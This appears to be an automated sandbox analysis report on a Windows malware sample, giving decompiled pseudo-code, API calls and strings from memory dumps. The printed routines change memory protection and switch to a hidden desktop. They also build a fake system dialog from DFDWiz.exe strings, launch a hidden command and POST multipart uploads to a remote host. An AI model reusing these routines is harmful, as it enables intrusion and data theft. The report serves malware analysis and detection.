API ID: OpenThread
String ID:
API String ID: 3092547327-0
Opcode ID: 8936b218d008d1655a736589cecff2c34729ea288f5f9e18c1d9757e92024a36
Instruction ID: a1a0c9167393e8424c4b86ed1e9e170334b19663c6f772ffeb6a6890d85ca94e
Opcode Fuzzy Hash: 8936b218d008d1655a736589cecff2c34729ea288f5f9e18c1d9757e92024a36
Instruction Fuzzy Hash: FBF05FB18183029FD384DF29C480A5BBBE4BB88744F008E2DF0A9D6240E775D648CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAADE0, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAADE0(long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;

				_v4 = _a4;
				_a4 = _a8;
				return 0 | NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16) > 0x00000000;
			}

0x6ecaadee
0x6ecaadf7
0x6ecaae16

APIs

NtProtectVirtualMemory.NTDLL ref: 6ECAAE07

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9034f9849f4124ffa5d6300b52b6d281f43325fd0382167c2827b217c63955f6
Instruction ID: 977696db1eb376bfeb7cd403dcd196d176b1d921820ac5a4aa554ddd6eb5900f
Opcode Fuzzy Hash: 9034f9849f4124ffa5d6300b52b6d281f43325fd0382167c2827b217c63955f6
Instruction Fuzzy Hash: 9CE0BFB620C342AF8349CF58D951C5BB3E9ABC8720F10CE1DB1BAC3690D730D8088B22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAA500, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAA500(void* _a4, void* _a8, long _a12) {
				union _MEMORY_INFORMATION_CLASS _v4;
				long* _t17;

				_v4 = 0;
				_t7 = (0 | NtQueryVirtualMemory(0xffffffff, _a4, 0, _a8, _a12, _t17) < 0x00000000) - 1; // -1
				return _t7 &  *_t17;
			}

0x6ecaa518
0x6ecaa52c
0x6ecaa533

APIs

NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,6ECAA6A4), ref: 6ECAA520

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 36acf529eb6e35959c71046f94ee37866bfc9005c8f00531d1d5c4fd6157f5e6
Instruction ID: 2ff7a7854dce104d4c154d16df2c3deefb0325be0ec8d6041211f3c7231c7665
Opcode Fuzzy Hash: 36acf529eb6e35959c71046f94ee37866bfc9005c8f00531d1d5c4fd6157f5e6
Instruction Fuzzy Hash: 86E0ECB511C202AFD714DF58CC81FABB3ECAB84364F208A1DB0B5C62C0D771E4088B22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA9D10, Relevance: 86.1, APIs: 43, Strings: 6, Instructions: 310
memorywindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6ECA9D10() {
				intOrPtr _v32;
				char _v264;
				char _v272;
				void* _v284;
				WCHAR* _v288;
				void* _v292;
				WCHAR* _v296;
				WCHAR* _v300;
				char _v324;
				char* _v328;
				intOrPtr _v332;
				WCHAR* _v340;
				void* _v344;
				void* _v348;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				intOrPtr _v372;
				long _v376;
				WCHAR* _v380;
				char _v384;
				void* _v388;
				void* _v392;
				void* _v396;
				char _v400;
				struct HINSTANCE__* _v404;
				void* _v408;
				short _v412;
				short _v416;
				char _v420;
				struct HDESK__* _t62;
				struct HDESK__* _t66;
				CHAR* _t72;
				WCHAR* _t114;
				void* _t118;
				WCHAR* _t119;
				WCHAR* _t120;
				struct HDESK__* _t121;
				struct HDESK__* _t122;
				char _t130;
				struct HINSTANCE__* _t136;
				void* _t139;
				void* _t141;
				struct HINSTANCE__* _t142;
				WCHAR* _t143;
				WCHAR* _t144;
				WCHAR* _t145;
				WCHAR* _t146;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t151;
				short* _t153;
				short* _t154;
				short* _t155;

				_t62 =  *0x6ecb0480; // 0x0
				SwitchDesktop(_t62);
				_t121 =  *0x6ecb0480; // 0x0
				SetThreadDesktop(_t121);
				__imp__CoInitializeEx(0, 6);
				_t142 = LoadLibraryA("comctl32.dll");
				_v404 = _t142;
				if(_t142 != 0) {
					_push(0xff000000);
					_push(1);
					_push( &_v400);
					_push(_t142);
					_v400 = 0xc590294f;
					_v396 = 0;
					_v392 = 0;
					_v388 = 0;
					E6ECA1DB0();
					_t153 =  &(( &_v412)[8]);
					if(_v388 != 0) {
						_t72 = GetCommandLineA();
						_v420 = 0;
						_t139 = E6ECAA3D0(_t72,  &_v420);
						_t154 =  &(_t153[4]);
						_v416 = _t139;
						if(_t139 != 0) {
							if(_v420 > 3) {
								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
								_t155 =  &(_t154[8]);
								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
								if(_t136 != 0) {
									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
									if(_t141 != 0) {
										_t23 = _t141 + 0x190; // 0x190
										_t143 = _t23;
										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
											_v340 = _t143;
										}
										_t25 = _t141 + 0x320; // 0x320
										_t144 = _t25;
										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
											_t114 = StrChrW(_t144, 0xa);
											if(_t114 != 0) {
												_v340 =  &(_t114[1]);
											}
										}
										_t27 = _t141 + 0xaf0; // 0xaf0
										_t145 = _t27;
										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
											_v288 = _t145;
										}
										_t29 = _t141 + 0xbb8; // 0xbb8
										_t146 = _t29;
										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
											_t30 = _t141 + 0xc80; // 0xc80
											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
												_t31 = _t141 + 0xc80; // 0xc80
												_v372 = _t31;
												_v384 = 1;
												_v380 = _t146;
												_v376 = 8;
												_v332 = 2;
												_v324 = 1;
												_v328 =  &_v384;
											}
										}
										_t40 = _t141 + 0xd48; // 0xd48
										_t147 = _t40;
										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
											_v296 = _t147;
										}
										_t42 = _t141 + 0xe10; // 0xe10
										_t148 = _t42;
										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
											_v300 = _t148;
										}
										_t44 = _t141 + 0xed8; // 0xed8
										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
											_t47 = _t141 + 0x1068; // 0x1068
											_t120 = _t47;
											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
											_v412 = 0;
											_t50 = _t141 + 0x1130; // 0x1130
											_t151 = _t50;
											if( *_t120 == 0) {
												_t120 = L"<n/a>";
											}
											_t52 = _t141 + 0xed8; // 0xed8
											wsprintfW(_t151, _t52,  &_v416, _t120);
											_t155 =  &(_t155[8]);
											_v300 = _t151;
										}
										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
										if(_t118 != 0) {
											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
											E6ECA9C50(0, 0x83f2, _t118);
											_v400( &_v380, 0, 0, 0, 0, 0);
											HeapFree(GetProcessHeap(), 0, _t118);
											if(_v32 != 0) {
												Sleep(0x1f4);
												E6ECA96D0(0);
											}
											Sleep(0x1f4);
										}
										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
											_t59 = _t141 + 0x3e8; // 0x3e8
											_t119 = _t59;
											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
												MessageBoxW(0, _t141, _t119, 0x40);
												Sleep(0x1f4);
											}
										}
										HeapFree(GetProcessHeap(), 0, _t141);
										_t142 = _v404;
									}
									FreeLibrary(_t136);
									_t139 = _v408;
								}
							}
							LocalFree(_t139);
						}
					}
					FreeLibrary(_t142);
				}
				__imp__CoUninitialize();
				_t66 =  *0x6ecb0484; // 0x0
				SwitchDesktop(_t66);
				_t122 =  *0x6ecb0484; // 0x0
				SetThreadDesktop(_t122);
				return 0;
			}

0x6eca9d16
0x6eca9d1e
0x6eca9d24
0x6eca9d2b
0x6eca9d36
0x6eca9d47
0x6eca9d49
0x6eca9d4f
0x6eca9d55
0x6eca9d5a
0x6eca9d60
0x6eca9d61
0x6eca9d62
0x6eca9d6a
0x6eca9d6e
0x6eca9d72
0x6eca9d76
0x6eca9d7b
0x6eca9d82
0x6eca9d89
0x6eca9d95
0x6eca9d9e
0x6eca9da0
0x6eca9da3
0x6eca9da9
0x6eca9db4
0x6eca9dba
0x6eca9dd4
0x6eca9dda
0x6eca9dee
0x6eca9df2
0x6eca9e0c
0x6eca9e10
0x6eca9e76
0x6eca9e76
0x6eca9e84
0x6eca9e86
0x6eca9e86
0x6eca9e8f
0x6eca9e8f
0x6eca9e9d
0x6eca9ea2
0x6eca9eaa
0x6eca9eaf
0x6eca9eaf
0x6eca9eaa
0x6eca9eb7
0x6eca9eb7
0x6eca9ed3
0x6eca9ed5
0x6eca9ed5
0x6eca9ede
0x6eca9ede
0x6eca9eef
0x6eca9ef3
0x6eca9f04
0x6eca9f06
0x6eca9f11
0x6eca9f19
0x6eca9f1d
0x6eca9f21
0x6eca9f29
0x6eca9f31
0x6eca9f35
0x6eca9f35
0x6eca9f04
0x6eca9f3b
0x6eca9f3b
0x6eca9f49
0x6eca9f4b
0x6eca9f4b
0x6eca9f54
0x6eca9f54
0x6eca9f62
0x6eca9f64
0x6eca9f64
0x6eca9f70
0x6eca9f81
0x6eca9f97
0x6eca9fa9
0x6eca9fa9
0x6eca9fb5
0x6eca9fbd
0x6eca9fc2
0x6eca9fc2
0x6eca9fcb
0x6eca9fcd
0x6eca9fcd
0x6eca9fd8
0x6eca9fe0
0x6eca9fe6
0x6eca9fe9
0x6eca9fe9
0x6ecaa006
0x6ecaa00a
0x6ecaa01c
0x6ecaa031
0x6ecaa041
0x6ecaa04b
0x6ecaa059
0x6ecaa060
0x6ecaa068
0x6ecaa068
0x6ecaa072
0x6ecaa072
0x6ecaa097
0x6ecaa09d
0x6ecaa09d
0x6ecaa0b5
0x6ecaa0bd
0x6ecaa0c8
0x6ecaa0c8
0x6ecaa0b5
0x6ecaa0d8
0x6ecaa0de
0x6ecaa0de
0x6ecaa0e3
0x6ecaa0e9
0x6ecaa0e9
0x6ecaa0ed
0x6ecaa0ef
0x6ecaa0ef
0x6ecaa0f5
0x6ecaa0f7
0x6ecaa0f7
0x6ecaa0fd
0x6ecaa103
0x6ecaa109
0x6ecaa10f
0x6ecaa116
0x6ecaa126

APIs

SwitchDesktop.USER32(00000000), ref: 6ECA9D1E
SetThreadDesktop.USER32(00000000), ref: 6ECA9D2B
CoInitializeEx.OLE32(00000000,00000006), ref: 6ECA9D36
LoadLibraryA.KERNEL32(comctl32.dll), ref: 6ECA9D41
GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6ECA9D89

Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4

wsprintfA.USER32 ref: 6ECA9DD4
LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9DE8
GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9DFF
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9E06
RtlZeroMemory.NTDLL(?,00000060), ref: 6ECA9E1D
LoadStringW.USER32 ref: 6ECA9E67
LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6ECA9E80
LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6ECA9E99
StrChrW.SHLWAPI(00000320,0000000A), ref: 6ECA9EA2
FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6ECA9ECB
LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6ECA9EEB
LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6ECA9F00
LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6ECA9F45
LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6ECA9F5E
LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6ECA9F7D
PathGetDriveNumberA.SHLWAPI(?), ref: 6ECA9F8B
PathBuildRootW.SHLWAPI(?,00000000), ref: 6ECA9F97
GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6ECA9FB5
wsprintfW.USER32 ref: 6ECA9FE0
GetProcessHeap.KERNEL32(00000000,00000105), ref: 6ECA9FFD
HeapAlloc.KERNEL32(00000000), ref: 6ECAA000
wsprintfA.USER32 ref: 6ECAA01C
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA048
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA04B
Sleep.KERNEL32(000001F4), ref: 6ECAA060
Sleep.KERNEL32(000001F4), ref: 6ECAA072
FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6ECAA093
FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6ECAA0B1
MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6ECAA0BD
Sleep.KERNEL32(000001F4), ref: 6ECAA0C8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECAA0D1
HeapFree.KERNEL32(00000000), ref: 6ECAA0D8
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA0E3
LocalFree.KERNEL32(00000000), ref: 6ECAA0EF
FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6ECAA0F7
CoUninitialize.OLE32 ref: 6ECAA0FD
SwitchDesktop.USER32(00000000), ref: 6ECAA109
SetThreadDesktop.USER32(00000000), ref: 6ECAA116

Part of subcall function 6ECA1DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
Part of subcall function 6ECA1DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48

Strings

`, xrefs: 6ECA9E39
DFDWiz.exe, xrefs: 6ECA9DC1
comctl32.dll, xrefs: 6ECA9D3C
%s%s, xrefs: 6ECA9DCE
/c start /b "" "%s" f w %d, xrefs: 6ECAA016
<n/a>, xrefs: 6ECA9FCD, 6ECA9FD2

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
API String ID: 3108343870-2776518243
Opcode ID: 1ee8778ffb216fb0951f3ae4327e4fbe517fb911186fe5be5bc534c94cf54683
Instruction ID: efb8bf53c2856de7698b6a0a3be2ab4ef9ada066161a8b90c3864d58a2ede00c
Opcode Fuzzy Hash: 1ee8778ffb216fb0951f3ae4327e4fbe517fb911186fe5be5bc534c94cf54683
Instruction Fuzzy Hash: 1AB15071144746ABE7609FA8CD89F9F7BB8EB89B44F00481CFB5697180EBB19444CF26

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5690, Relevance: 72.0, APIs: 33, Strings: 8, Instructions: 281
networkmemorysleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E6ECA5690() {
				char* _t71;
				long _t87;
				void* _t100;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t111;
				CHAR* _t114;
				int _t115;
				long _t116;
				long _t119;
				void* _t122;
				intOrPtr _t146;
				void* _t147;
				void* _t149;
				intOrPtr _t150;
				void* _t151;
				void* _t152;
				int _t153;
				intOrPtr _t154;
				void* _t156;
				void* _t157;

				 *((intOrPtr*)(_t156 + 0x20)) = 0;
				 *(_t156 + 0x1c) = 0;
				_t3 = GetTickCount() + 0x493e0; // 0x493e0
				_t146 = _t3;
				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
				while(1) {
					_t150 =  *((intOrPtr*)(_t156 + 0x40));
					 *(_t156 + 0x18) = 0x842a0000;
					if( *(_t150 + 0xc) != 0) {
						 *(_t156 + 0x18) = 0x84aa3300;
					}
					_t71 = M6ECB0518; // 0x0
					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
					 *(_t156 + 0x30) = _t152;
					if(_t152 == 0) {
						L28:
						if(GetTickCount() >= _t146) {
							L32:
							return  *((intOrPtr*)(_t156 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t156 + 0x34) = _t147;
					if(_t147 == 0) {
						L26:
						InternetCloseHandle(_t152);
						if( *(_t156 + 0x1c) != 0) {
							goto L32;
						}
						_t146 =  *((intOrPtr*)(_t156 + 0x38));
						goto L28;
					}
					_t122 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0);
					if(_t122 == 0) {
						L25:
						InternetCloseHandle(_t147);
						goto L26;
					}
					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t151 == 0) {
						L24:
						InternetCloseHandle(_t122);
						_t147 =  *(_t156 + 0x34);
						goto L25;
					}
					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
					_t156 = _t156 + 0xc;
					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
					_t153 = 0;
					 *((intOrPtr*)(_t156 + 0x24)) = 0;
					 *((intOrPtr*)(_t156 + 0x28)) = 0;
					 *(_t156 + 0x18) = 0;
					 *(_t156 + 0x30) = GetTickCount();
					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t149 != 0) {
						 *(_t156 + 0x34) = _t149;
						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
						_t30 = _t153 + 1; // 0x1
						_t114 = _t149 + _t30;
						 *(_t156 + 0x44) = _t114;
						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
						 *(_t156 + 0x34) = _t115;
						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
						_t157 = _t156 + 0x28;
						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
						_t156 = _t157 + 0xc;
						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
					}
					if(HttpSendRequestExA(_t122, 0, 0, 0, 0) == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t149 != 0) {
							HeapFree(GetProcessHeap(), 0, _t149);
						}
						HeapFree(GetProcessHeap(), 0, _t151);
						_t152 =  *(_t156 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
					_t100 = E6ECA54E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
					_t156 = _t156 + 0xc;
					_t154 =  *((intOrPtr*)(_t156 + 0x40));
					if(_t100 != _t153) {
						L19:
						HttpEndRequestA(_t122, 0, 0, 0);
						if( *(_t156 + 0x1c) != 0) {
							_t102 = E6ECA5540(_t122, _t154 + 0x2c);
							_t156 = _t156 + 8;
							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
						}
						goto L21;
					}
					_t103 = _t154 + 0x18;
					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
						L13:
						_t104 = _t154 + 0x20;
						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
							L15:
							_t105 = _t154 + 0x28;
							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
								L17:
								 *(_t156 + 0x30) =  *(_t156 + 0x18);
								_t107 = E6ECA54E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
								_t156 = _t156 + 0xc;
								if(_t107 ==  *(_t156 + 0x18)) {
									 *(_t156 + 0x1c) = 1;
								}
								goto L19;
							}
							_t108 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
							_t156 = _t156 + 0xc;
							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t109 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
						_t156 = _t156 + 0xc;
						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t111 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
					_t156 = _t156 + 0xc;
					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}

0x6eca5699
0x6eca569d
0x6eca56a7
0x6eca56a7
0x6eca56ad
0x6eca56c0
0x6eca56c0
0x6eca56c8
0x6eca56d0
0x6eca56d2
0x6eca56d2
0x6eca56da
0x6eca56ee
0x6eca56f0
0x6eca56f6
0x6eca59bd
0x6eca59c5
0x6eca59f1
0x6eca59fc
0x6eca59fc
0x6eca59cc
0x00000000
0x6eca59cc
0x6eca570c
0x6eca5714
0x6eca5720
0x6eca572c
0x6eca573e
0x6eca5754
0x6eca5756
0x6eca575c
0x6eca59ab
0x6eca59ac
0x6eca59b7
0x00000000
0x00000000
0x6eca59b9
0x00000000
0x6eca59b9
0x6eca5782
0x6eca5786
0x6eca59a4
0x6eca59a5
0x00000000
0x6eca59a5
0x6eca57a2
0x6eca57a6
0x6eca5999
0x6eca599a
0x6eca59a0
0x00000000
0x6eca59a0
0x6eca57b7
0x6eca57bd
0x6eca57c8
0x6eca57ce
0x6eca57d0
0x6eca57d4
0x6eca57d8
0x6eca57e7
0x6eca57f8
0x6eca5805
0x6eca5809
0x6eca581f
0x6eca582e
0x6eca5830
0x6eca5830
0x6eca583a
0x6eca583e
0x6eca5844
0x6eca584e
0x6eca5860
0x6eca5866
0x6eca5871
0x6eca5882
0x6eca5888
0x6eca5893
0x6eca5893
0x6eca58aa
0x6eca59e2
0x6eca59e8
0x6eca59e8
0x6eca5971
0x6eca5973
0x6eca597f
0x6eca597f
0x6eca598f
0x6eca5995
0x00000000
0x6eca5995
0x6eca58bb
0x6eca58bf
0x6eca58c4
0x6eca58c9
0x6eca58cd
0x6eca594c
0x6eca5953
0x6eca595e
0x6eca5965
0x6eca596a
0x6eca596d
0x6eca596d
0x00000000
0x6eca595e
0x6eca58d3
0x6eca58d6
0x6eca58eb
0x6eca58ef
0x6eca58f2
0x6eca5907
0x6eca590b
0x6eca590e
0x6eca5923
0x6eca5932
0x6eca5936
0x6eca593b
0x6eca5942
0x6eca5944
0x6eca5944
0x00000000
0x6eca5942
0x6eca5916
0x6eca591b
0x6eca5921
0x00000000
0x00000000
0x00000000
0x6eca5921
0x6eca58fa
0x6eca58ff
0x6eca5905
0x00000000
0x00000000
0x00000000
0x6eca5905
0x6eca58de
0x6eca58e3
0x6eca58e9
0x00000000
0x00000000
0x00000000
0x6eca58e9

APIs

GetTickCount.KERNEL32 ref: 6ECA56A1
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6ECA56E8
InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6ECA5714
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6ECA5720
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6ECA572C
InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6ECA574E
HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6ECA577C
GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA5793
HeapAlloc.KERNEL32(00000000), ref: 6ECA57A0
wsprintfA.USER32 ref: 6ECA57B7
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA57C8
GetTickCount.KERNEL32 ref: 6ECA57DC
RtlRandom.NTDLL(?), ref: 6ECA57EB
GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA57FC
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5803
wsprintfA.USER32 ref: 6ECA5823
wsprintfA.USER32 ref: 6ECA583E
wsprintfA.USER32 ref: 6ECA5860
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5871
wsprintfA.USER32 ref: 6ECA5882
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5893
HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA58A2
HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6ECA5953
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5978
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA597F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5988
